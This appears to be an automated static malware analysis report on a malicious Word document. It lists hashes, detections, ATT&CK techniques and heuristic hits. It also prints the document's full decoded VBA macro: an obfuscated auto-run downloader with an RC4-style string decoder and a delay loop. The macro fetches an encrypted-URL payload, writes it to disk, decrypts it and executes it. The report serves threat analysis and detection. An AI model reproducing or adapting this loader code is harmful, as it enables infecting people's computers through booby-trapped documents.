Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 aa77705f65f82d04…

MALICIOUS

Office (OOXML)

31.9 KB Created: 2015-06-24 11:31:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2015-09-14
MD5: f8b97986b9567278c69c20c3cae15431 SHA-1: 49144422d6ee26ae140b23b5a66fc35efe6acf29 SHA-256: aa77705f65f82d043d2d15fc8aec84d518b6a46f778e85e54e763745a69c4baf
320 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information

The OOXML document contains a VBA macro loader that is obfuscated and uses CreateObject to execute code, a critical finding. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', indicating a social engineering lure to bypass macro security. The VBA script itself appears to be a deobfuscation routine, likely intended to download and execute a second-stage payload, though the full payload is truncated.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    HV2WjNLob8Y = Environ(E5IQj(Chr(27) + Chr(2) + Chr(172) + Chr(255) + Chr(77) + Chr(190) + Chr(142), "Lh7WCju5tHKW2d")) & "\" & PM1ZlKBBtLdWjOm & E5IQj(Chr(38) + Chr(6) + Chr(210) + Chr(118), "Cnr2u6Xzx31pvx")
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 12414 bytes
SHA-256: 4f3f52e93d2caeee2a1382c2eb4fd01f1de1b4375391a40128861a3a53f477d8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
88 of 160 identifiers look randomly generated (e.g. 'P8I7R0viP3pjJ4otdfDF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function E5IQj(ByVal O8QGyoRH9 As String, ByVal OwFgnpbnX9LC As String) As String
Dim SLExo33 As Long, KFvNBjer As Long
SLExo33 = 9
KFvNBjer = 55
If SLExo33 + KFvNBjer > 2 Then
KFvNBjer = SLExo33 + 89
Else
InputBox 13
End If
On Error Resume Next
Dim P8I7R0viP3pjJ4otdfDF As Long, B4q3y2KoTI As Long
P8I7R0viP3pjJ4otdfDF = 85
B4q3y2KoTI = 26
If P8I7R0viP3pjJ4otdfDF + B4q3y2KoTI > 2 Then
B4q3y2KoTI = P8I7R0viP3pjJ4otdfDF + 52
Else
InputBox 27
End If
Dim Qa94(0 To 255) As Integer, Qs8jUQB1am As Long, Twkk As Long, OqN2Y1Cnln7l As Long, R2Yci01Hg6() As Byte, BtyO1() As Byte, YfdY0w3JOYxZ As Byte
Dim SolT8QjTes8jUQB As Long, HBmWKosUtyzOjE As Long
SolT8QjTes8jUQB = 27
HBmWKosUtyzOjE = 76
If SolT8QjTes8jUQB + HBmWKosUtyzOjE > 2 Then
HBmWKosUtyzOjE = SolT8QjTes8jUQB + 27
Else
InputBox 48
End If
R2Yci01Hg6() = StrConv(OwFgnpbnX9LC, vbFromUnicode)
Dim AFn7l As Long, NYrU1 As Long
AFn7l = 15
NYrU1 = 39
If AFn7l + NYrU1 > 2 Then
NYrU1 = AFn7l + 38
Else
InputBox 68
End If
For Qs8jUQB1am = 0 To 255
Qa94(Qs8jUQB1am) = Qs8jUQB1am
Next Qs8jUQB1am
Qs8jUQB1am = 0
Twkk = 0
OqN2Y1Cnln7l = 0
For Qs8jUQB1am = 0 To 255
Twkk = (Twkk + Qa94(Qs8jUQB1am) + R2Yci01Hg6(Qs8jUQB1am Mod Len(OwFgnpbnX9LC))) Mod 256
YfdY0w3JOYxZ = Qa94(Qs8jUQB1am)
Qa94(Qs8jUQB1am) = Qa94(Twkk)
Qa94(Twkk) = YfdY0w3JOYxZ
Next Qs8jUQB1am
Qs8jUQB1am = 0
Twkk = 0
OqN2Y1Cnln7l = 0
BtyO1() = StrConv(O8QGyoRH9, vbFromUnicode)
For Qs8jUQB1am = 0 To Len(O8QGyoRH9)
Twkk = (Twkk + 1) Mod 256
OqN2Y1Cnln7l = (OqN2Y1Cnln7l + Qa94(Twkk)) Mod 256
YfdY0w3JOYxZ = Qa94(Twkk)
Qa94(Twkk) = Qa94(OqN2Y1Cnln7l)
Qa94(OqN2Y1Cnln7l) = YfdY0w3JOYxZ
BtyO1(Qs8jUQB1am) = BtyO1(Qs8jUQB1am) Xor (Qa94((Qa94(Twkk) + Qa94(OqN2Y1Cnln7l)) Mod 256))
Next Qs8jUQB1am
Dim HRmXO741CDj As Long, OPx1LkbIanUMAvpR As Long
HRmXO741CDj = 49
OPx1LkbIanUMAvpR = 10
If HRmXO741CDj + OPx1LkbIanUMAvpR > 2 Then
OPx1LkbIanUMAvpR = HRmXO741CDj + 1
Else
InputBox 2
End If
E5IQj = StrConv(BtyO1, vbUnicode)
Dim EJyDZ8gkcc0PWNYW5 As Long, YfNKTv98x As Long
EJyDZ8gkcc0PWNYW5 = 29
YfNKTv98x = 19
If EJyDZ8gkcc0PWNYW5 + YfNKTv98x > 2 Then
YfNKTv98x = EJyDZ8gkcc0PWNYW5 + 75
Else
InputBox 6
End If
End Function
Sub Document_Open()
Dim BLgyF7K As Long, Lo1CjagPv As Long
BLgyF7K = 49
Lo1CjagPv = 10
If BLgyF7K + Lo1CjagPv > 2 Then
Lo1CjagPv = BLgyF7K + 1
Else
InputBox 2
End If
Dim OQ2R0NXv6j As Long, MOPZ9T2 As Long, VAy878rF6rBojR As Long
Dim FV1eDJ0gRzdO As Long, UauTrVbcN As Long
FV1eDJ0gRzdO = 93
UauTrVbcN = 3
If FV1eDJ0gRzdO + UauTrVbcN > 2 Then
UauTrVbcN = FV1eDJ0gRzdO + 48
Else
InputBox 61
End If
OQ2R0NXv6j = 934884333: MOPZ9T2 = 0: VAy878rF6rBojR = 0
Dim NYNtZKRtIJS As Long, ED6YKKHko1Cjag As Long
NYNtZKRtIJS = 40
ED6YKKHko1Cjag = 11
If NYNtZKRtIJS + ED6YKKHko1Cjag > 2 Then
ED6YKKHko1Cjag = NYNtZKRtIJS + 97
Else
InputBox 12
End If
For MOPZ9T2 = 1 To OQ2R0NXv6j
VAy878rF6rBojR = VAy878rF6rBojR + 1
Next MOPZ9T2
Dim W6jK5 As Long, H7Z1 As Long
W6jK5 = 37
H7Z1 = 92
If W6jK5 + H7Z1 > 2 Then
H7Z1 = W6jK5 + 52
Else
InputBox 48
End If
If VAy878rF6rBojR = OQ2R0NXv6j Then
Dim LacsYpv5kFLWJql As Long, ADiyuEI2sVtpy4nY As Long
LacsYpv5kFLWJql = 83
ADiyuEI2sVtpy4nY = 53
If LacsYpv5kFLWJql + ADiyuEI2sVtpy4nY > 2 Then
ADiyuEI2sVtpy4nY = LacsYpv5kFLWJql + 45
Else
InputBox 23
End If
KjOOdaXr2mjVi
Dim LKYTd0 As Long, HFZfBEZ1RLq As Long
LKYTd0 = 59
HFZfBEZ1RLq = 28
If LKYTd0 + HFZfBEZ1RLq > 2 Then
HFZfBEZ1RLq = LKYTd0 + 48
Else
InputBox 60
End If
Else
Dim TuiC As Long, RcMZVEuyU2NwtV39p As Long
TuiC = 38
RcMZVEuyU2NwtV39p = 64
If TuiC + RcMZVEuyU2NwtV39p > 2 Then
RcMZVEuyU2NwtV39p = TuiC + 40
Else
InputBox 14
End If
IhlpDz3Sl
Dim QaWtWBn6r02 As Long, AJad93hLCBYeA As Long
QaWtWBn6r02 = 84
AJad93hLCBYeA = 25
If QaWtWBn6r02 + AJad93hLCBYeA > 2 Then
AJad93hLCBYeA = QaWtWBn6r02 + 6
Else
InputBox 88
End If
End If
Dim YHICt0kDxhDiyuEI As Long, W8jA8dN4967ci1uj1 As Long
YHICt0kDxhDiyuEI = 20
W8jA8dN4967ci1uj1 = 19
If YHICt0kDxhDiyuEI + W8jA8dN4967ci1uj1 > 2 Then
W8jA8dN4967ci1uj1 = YHICt0kDxhDiyuEI + 49
Else
InputBox 56
End If
End Sub
Function PM1ZlKBBtLdWjOm() As String
Dim GVIwdfUlDJ1W5Ow As Long, YolmFLWJql As Long
GVIwdfUlDJ1W5Ow = 79
YolmFLWJql = 94
If GVIwdfUlDJ1W5Ow + YolmFLWJql > 2 Then
YolmFLWJql = GVIwdfUlDJ1W5Ow + 74
Else
InputBox 35
End If
Dim LHhep9l3MmwvUN() As Byte, MIYKQ2() As Byte, Ssc2i As Long, XRgGNMR8W4jbHU As Long, TKO1Liiqmxgtz As String, OKAtI As String, Y9QPoVtkoHZVJL As Long
Dim KQhB0OYG0 As Long, YCT2 As Long
KQhB0OYG0 = 97
YCT2 = 14
If KQhB0OYG0 + YCT2 > 2 Then
YCT2 = KQhB0OYG0 + 93
Else
InputBox 54
End If
Y9QPoVtkoHZVJL = 0
Dim G36ouW7ZA As Long, B3swQOCS8 As Long
G36ouW7ZA = 30
B3swQOCS8 = 63
If G36ouW7ZA + B3swQOCS8 > 2 Then
B3swQOCS8 = G36ouW7ZA + 91
Else
InputBox 33
End If
GXHUiAiiDq:
Dim MGZVSguwS1A As Long, YkfPHMEgJ9vMmYV As Long
MGZVSguwS1A = 95
YkfPHMEgJ9vMmYV = 48
If MGZVSguwS1A + YkfPHMEgJ9vMmYV > 2 Then
YkfPHMEgJ9vMmYV = MGZVSguwS1A + 64
Else
InputBox 88
End If
Randomize
OKAtI = Int(30 * Rnd)
If OKAtI < 4 Then GoTo GXHUiAiiDq
Y9QPoVtkoHZVJL = OKAtI
If Y9QPoVtkoHZVJL > 0& Then
Dim FffRE As Long, DtmAMNZ8 As Long
FffRE = 61
DtmAMNZ8 = 70
If FffRE + DtmAMNZ8 > 2 Then
DtmAMNZ8 = FffRE + 96
Else
InputBox 17
End If
TKO1Liiqmxgtz = E5IQj(Chr(80) + Chr(174) + Chr(137) + Chr(194) + Chr(1) + Chr(39) + Chr(224) + Chr(212) + Chr(113) + Chr(202), "RyqNK")
Randomize
LHhep9l3MmwvUN = TKO1Liiqmxgtz
Ssc2i = Len(TKO1Liiqmxgtz) - 1&
Y9QPoVtkoHZVJL = (Y9QPoVtkoHZVJL * 2&) - 1&
ReDim MIYKQ2(Y9QPoVtkoHZVJL) As Byte
Dim QWQWh1gJ9vMmYV As Long, Ar9cwl60bf As Long
QWQWh1gJ9vMmYV = 34
Ar9cwl60bf = 78
If QWQWh1gJ9vMmYV + Ar9cwl60bf > 2 Then
Ar9cwl60bf = QWQWh1gJ9vMmYV + 46
Else
InputBox 67
End If
For XRgGNMR8W4jbHU = 0& To Y9QPoVtkoHZVJL Step 2&
MIYKQ2(XRgGNMR8W4jbHU) = LHhep9l3MmwvUN(CLng(Ssc2i * Rnd) * 2&)
Next
Dim LmGnUkeF4 As Long, NSzly7yT As Long
LmGnUkeF4 = 87
NSzly7yT = 45
If LmGnUkeF4 + NSzly7yT > 2 Then
NSzly7yT = LmGnUkeF4 + 70
Else
InputBox 69
End If
End If
Dim SeujMR9jafC As Long, OZtLMvqv7Ma As Long
SeujMR9jafC = 54
OZtLMvqv7Ma = 45
If SeujMR9jafC + OZtLMvqv7Ma > 2 Then
OZtLMvqv7Ma = SeujMR9jafC + 46
Else
InputBox 43
End If
PM1ZlKBBtLdWjOm = MIYKQ2
Dim FlW6Zt As Long, VhSxH18VFgo As Long
FlW6Zt = 6
VhSxH18VFgo = 37
If FlW6Zt + VhSxH18VFgo > 2 Then
VhSxH18VFgo = FlW6Zt + 44
Else
InputBox 49
End If
End Function
Sub IhlpDz3Sl()
Dim NYpwGwuE2zZvva As Long, JkeF4La3gb As Long
NYpwGwuE2zZvva = 35
JkeF4La3gb = 50
If NYpwGwuE2zZvva + JkeF4La3gb > 2 Then
JkeF4La3gb = NYpwGwuE2zZvva + 30
Else
InputBox 90
End If
WeekdayName 22
AppActivate 90
LITwW2BRRIpVl = LCase(56)
Choose 60, LDcHHDmS58yb
LOLblqaRmW3wG = CStr(1)
GetSetting 55, 64, 90
HrtB2Tcjk6XdG8uI = UCase(11)
Tan 51
If CDec(76) = True Then Mwzt = 52
DateSerial 26, 78, 21
IbwljesrWwxx3yJsY = CSng(19)
Rate 72, 37, 70
If CCur(43) = True Then EjPyO4kPRa5 = 512
Filter Bq9U64BzjscJ7yk, 10
Sin 52
CreateObject "H7dTVcru6fH", "K0FFAShr8q2eel"
Load DVA5cocCrNJE
Loc 73
Stop
Partition 61, 96, 91, 35
B1Ib53pg04p = Fix(77)
FreeFile 24
Beep
DateDiff "YifHRfde", 9, 2
DateAdd "C3ONgPvFsY", 24, 57
Round 85, 27
Resume
Log 3
IPmt 21, 66, 56, 13
D9Rwz = DateValue(17)
Dim YCkS As Long, AqKLNqCVKuV As Long
YCkS = 82
AqKLNqCVKuV = 34
If YCkS + AqKLNqCVKuV > 2 Then
AqKLNqCVKuV = YCkS + 32
Else
InputBox 63
End If
End Sub
Sub PYktFwzAafJKCFkE(Y3ZkZhTlTEDFwLou As Long)
Dim WASsD As Long, UUVlUhj7 As Long
WASsD = 90
UUVlUhj7 = 8
If WASsD + UUVlUhj7 > 2 Then
UUVlUhj7 = WASsD + 9
Else
InputBox 6
End If
Dim IL9iI7hjsVJvWAp As Long
Dim In9YKpn3Z0wsX As Long, GFWBxhvu9CAdMVy0 As Long
In9YKpn3Z0wsX = 37
GFWBxhvu9CAdMVy0 = 68
If In9YKpn3Z0wsX + GFWBxhvu9CAdMVy0 > 2 Then
GFWBxhvu9CAdMVy0 = In9YKpn3Z0wsX + 75
Else
InputBox 80
End If
IL9iI7hjsVJvWAp = Timer + Y3ZkZhTlTEDFwLou
Do While Timer < IL9iI7hjsVJvWAp
DoEvents
Loop
Dim IdxowvXstvEFkHW As Long, OIsRKhM81VzssoR As Long
IdxowvXstvEFkHW = 91
OIsRKhM81VzssoR = 5
If IdxowvXstvEFkHW + OIsRKhM81VzssoR > 2 Then
OIsRKhM81VzssoR = IdxowvXstvEFkHW + 19
Else
InputBox 77
End If
End Sub
Sub KjOOdaXr2mjVi()
Dim P1K3Ll4vRXRYUoZ As Long, AxIu9JemRS8uK As Long
P1K3Ll4vRXRYUoZ = 59
AxIu9JemRS8uK = 56
If P1K3Ll4vRXRYUoZ + AxIu9JemRS8uK > 2 Then
AxIu9JemRS8uK = P1K3Ll4vRXRYUoZ + 65
Else
InputBox 11
End If
Dim HV2WjNLob8Y As String, HbuAyBzKdjUX6Ec As Object, ReNu8rK7d As Integer
Dim Opbjr9MH As Long, OdsQNWy3wbl As Long
Opbjr9MH = 15
OdsQNWy3wbl = 35
If Opbjr9MH + OdsQNWy3wbl > 2 Then
OdsQNWy3wbl = Opbjr9MH + 2
Else
InputBox 2
End If
HV2WjNLob8Y = Environ(E5IQj(Chr(27) + Chr(2) + Chr(172) + Chr(255) + Chr(77) + Chr(190) + Chr(142), "Lh7WCju5tHKW2d")) & "\" & PM1ZlKBBtLdWjOm & E5IQj(Chr(38) + Chr(6) + Chr(210) + Chr(118), "Cnr2u6Xzx31pvx")
Dim DelHqjyAlcW As Long, GPeE1CcSt9OV As Long
DelHqjyAlcW = 28
GPeE1CcSt9OV = 25
If DelHqjyAlcW + GPeE1CcSt9OV > 2 Then
GPeE1CcSt9OV = DelHqjyAlcW + 34
Else
InputBox 6
End If
Set HbuAyBzKdjUX6Ec = CreateObject(E5IQj(Chr(188) + Chr(29) + Chr(101) + Chr(145) + Chr(87) + Chr(215) + Chr(207) + Chr(80) + Chr(74) + Chr(203) + Chr(120) + Chr(125) + Chr(13) + Chr(181) + Chr(63) + Chr(9) + Chr(143), "RGkkLDvD"))
Dim YIGJRfpodHxIu9Je As Long, PsI6NijzhVv9 As Long
YIGJRfpodHxIu9Je = 21
PsI6NijzhVv9 = 19
If YIGJRfpodHxIu9Je + PsI6NijzhVv9 > 2 Then
PsI6NijzhVv9 = YIGJRfpodHxIu9Je + 50
Else
InputBox 57
End If
HbuAyBzKdjUX6Ec.Open E5IQj(Chr(229) + Chr(138) + Chr(171), "P2Bjb2Zb4IMIl"), E5IQj(Chr(90) + Chr(107) + Chr(125) + Chr(102) + Chr(103) + Chr(177) + Chr(28) + Chr(228) + Chr(217) + Chr(249) + Chr(195) + Chr(33) + Chr(66) + Chr(85) + Chr(189) + Chr(193) + Chr(42) + Chr(11) + Chr(179) + Chr(239) + Chr(43) + Chr(190) + Chr(21) + Chr(224) + Chr(98) + Chr(196) + Chr(54), "XTzcvHdnKKsrrGI8k"), False
Dim PC7359I As Long, OyY3LkeoAEjbV As Long
PC7359I = 60
OyY3LkeoAEjbV = 74
If PC7359I + OyY3LkeoAEjbV > 2 Then
OyY3LkeoAEjbV = PC7359I + 32
Else
InputBox 83
End If
HbuAyBzKdjUX6Ec.setRequestHeader E5IQj(Chr(41) + Chr(185) + Chr(25) + Chr(130) + Chr(168) + Chr(5) + Chr(223) + Chr(34) + Chr(115) + Chr(100), "EpTaKVbBLs67R"), E5IQj(Chr(220) + Chr(180) + Chr(9) + Chr(56) + Chr(91) + Chr(21) + Chr(249) + Chr(186) + Chr(213) + Chr(240) + Chr(34), "OLPQVjKsgcg4X")
HbuAyBzKdjUX6Ec.send
If HbuAyBzKdjUX6Ec.readyState = 4 And HbuAyBzKdjUX6Ec.Status = 200 Then
Dim Jze2fdemxtOvMN6V As Long, QeFXck80 As Long
Jze2fdemxtOvMN6V = 51
QeFXck80 = 56
If Jze2fdemxtOvMN6V + QeFXck80 > 2 Then
QeFXck80 = Jze2fdemxtOvMN6V + 40
Else
InputBox 88
End If
ReNu8rK7d = FreeFile
Open HV2WjNLob8Y For Binary Access Write Lock Write As #ReNu8rK7d
Put #ReNu8rK7d, , E5IQj(StrConv(HbuAyBzKdjUX6Ec.ResponseBody, vbUnicode), E5IQj(Chr(98) + Chr(64) + Chr(121) + Chr(139) + Chr(251) + Chr(49) + Chr(61) + Chr(115) + Chr(36), "RmDJHDpx8Yl"))
Close #ReNu8rK7d
Dim MZBNM9FS As Long, R2gB9DIZwEF4 As Long
MZBNM9FS = 43
R2gB9DIZwEF4 = 54
If MZBNM9FS + R2gB9DIZwEF4 > 2 Then
R2gB9DIZwEF4 = MZBNM9FS + 47
Else
InputBox 69
End If
PYktFwzAafJKCFkE 1
Dim YicnFeNhP As Long, H9knjdzNd As Long
YicnFeNhP = 55
H9knjdzNd = 43
If YicnFeNhP + H9knjdzNd > 2 Then
H9knjdzNd = YicnFeNhP + 78
Else
InputBox 46
End If
CreateObject(E5IQj(Chr(101) + Chr(158) + Chr(101) + Chr(119) + Chr(144) + Chr(184) + Chr(29) + Chr(45) + Chr(110) + Chr(230) + Chr(57) + Chr(150) + Chr(47), "TI2WT1o5aZ")).exec """" & HV2WjNLob8Y & """"
Dim Cm6KIkLy As Long, V2A2Iu29bEzRsTP8K As Long
Cm6KIkLy = 6
V2A2Iu29bEzRsTP8K = 87
If Cm6KIkLy + V2A2Iu29bEzRsTP8K > 2 Then
V2A2Iu29bEzRsTP8K = Cm6KIkLy + 69
Else
InputBox 95
End If
End If
Dim F7piux1IBpiYhe As Long, Rxr6MjcnrK As Long
F7piux1IBpiYhe = 38
Rxr6MjcnrK = 43
If F7piux1IBpiYhe + Rxr6MjcnrK > 2 Then
Rxr6MjcnrK = F7piux1IBpiYhe + 27
Else
InputBox 75
End If
Set HbuAyBzKdjUX6Ec = Nothing
Dim BaOJ4fRBi0vV As Long, Hb80lLlVto3iG As Long
BaOJ4fRBi0vV = 81
Hb80lLlVto3iG = 13
If BaOJ4fRBi0vV + Hb80lLlVto3iG > 2 Then
Hb80lLlVto3iG = BaOJ4fRBi0vV + 64
Else
InputBox 63
End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 32256 bytes
SHA-256: 9d1feebfeaba38bc0e4716e7f445e6ac9604932bbcd93c9f337a8796b55fdd28
Detection
ClamAV: Doc.Malware.Chronos-6897935-0
Obfuscation or payload: likely
167 of 333 identifiers look randomly generated (e.g. 'HRmXO741CDj2ThisDocument') — consistent with name-mangling obfuscation.

Open this report in the interactive analyzer, or submit your own file for analysis.